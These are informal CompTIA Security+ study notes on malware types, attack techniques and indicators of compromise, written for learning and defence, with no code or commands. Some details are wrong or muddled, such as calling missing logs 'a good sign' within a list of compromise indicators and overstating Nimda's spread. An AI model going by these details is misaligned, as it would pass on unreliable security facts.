How Can We Help?
CompTIA Security – Malware
CompTIA IT Security Course
Section 6
Malware
Malware is any s/w designed to maliciously harm a computer
needs 2 things:
threat vector – the specific method used to attack eg
via
unpatched s/w
installing code
phishing campaign
other vulnerabilities
the attack vector
means by which the attacker gains access.. how they break and and how they infect..
eg via
unauthorized login
social engineering
viruses
worms
trojans
RATs
ransomware
zombies/botnets
rootkits
backdoors/logic bombs
keloggers
spyware/bloatware
virus
multipartite virus is a combination of boot sector virus and a program virus
it gets loaded every time computer reboots, and then installs itself in a program.
even if a antivirus program removes the program virus, it may have missed the boot sector virus!
encrypted virus
hides itself by encrypting itself
polymorphic virus
advanced version of encrypted virus ; also changes the virus code each time it is executed in order to decrease change of detection
metamorphic virus
can rewrite themselves entirely before infecting – a further advance on polymorphic
stealth virus
a technique a virus uses to avoid being detected by AV S/W
armored virus
have a layer of protection to protect the virus from being detected.
hoax virus
tech isnt a virus but a form of social engineering trying to claim your system is infected, eg in order to demand a ransom
WORM
is a virus which can replicate itself between diff computers
v dangerous for 2 reasons:
1. can infect computers
2. can disrupt network traffic and processing power
eg DoS attack
they can spread in very short period of time
eg Nimda (admin backwards) infected much of worlds PCs in 25min, also
Conficker one of the largest worms, infected up to 15 mill systems!
needed an MS patch
BOTNETS and ZOMBIES
Botnets are networks of comprimised machines called zombies who perform the task using remote commands
a botnet can have a lot of processing power
zombie is the individual comprimised computer node in the botnet
ROOTKIT
v powerful and difficult to detect as AVs cant easily find them
gives admin/root level control without being detected – highest level of OS ring 1 or 0
DLL injection – forcing a dll library file to be loaded – which has been infected, using a shim…
shim = s/w code placed between 2 components
BACKDOORS = orig created by programmers to give a legit way into a program if there is a problem..
nowadays they are not in vogue as are regarded as security risk
easter eggs = jokes/gaps which pop up
logic bomb = only executes when certain conditions are met
KEYLOGGERs
can be s/w or h/w based.
s/w often use phishing or soc eng to infect
h/w has to be physically connected eg usb thumb drive
data theft a big risk with keyloggers
both for consumers domestic users and corporates
how to counter:
update s/w patches regularly
use AV up to date scanning
phishing/soc eng awareness for staff
use MFA systems
encrypt keystrokes when sent to systems, eg ssh
physical checks of PCs laptops, servers
SPYWARE/BLOATWARE
spyware:
malicious s/w which gathers and send info about a user or org to an outside person
can be bundled with normal s/w
inst via malicious website
via clicking on a popup
bloatware:
any s/w preinstalled on a pc or device – regardless of whether you want or need it… takes up processing power and drive space
a marketing technique
can also be toolbars extensions etc for browsers etc
can cause security issues
can represent a potential threat vector.
best is to remove all bloatware which you dont need = there are tools, or you can remove manually
MALWARE ATTACK TECHNIQUES
Code injection – uses a legit process to add the code to the program
Masquerading
DLL Injection
DLL Sideloading
Process Hollowing
the “living off the land” process… threat actors exploit standard OS tools, eg on Win – utilizing power shell cmds
rather than trying to use own homemade commands
INDICATIONS OF MALWARE ATTACKS
9 indications
Account lockouts – malware can trigger multiple lockouts, can be a red flag if many users have this problem all of a sudden
Concurrent session utilization – many users may only have one session active, but if one or more suddenly have multiple sessions open, this can be an indication
blocked content – if more and more content than usal is getting blocked
impossible travel – someone logging from one geog location and then a few mins or so later from a much further location which is impossible to travel to in that short time!
resource consumption – botnets worms etc can consume large amounts of resources – memory, processes, network traffic
resource inaccessiblity – if machines or volumes suddenly not responding or cannot be logged into or connected to
out of cycle or out of hourse logging – can be indication if people are usually just 9-5
missing logs – this can be a good sign
published or documented attacks = if news media finds out and reports that you are comprimised before you do!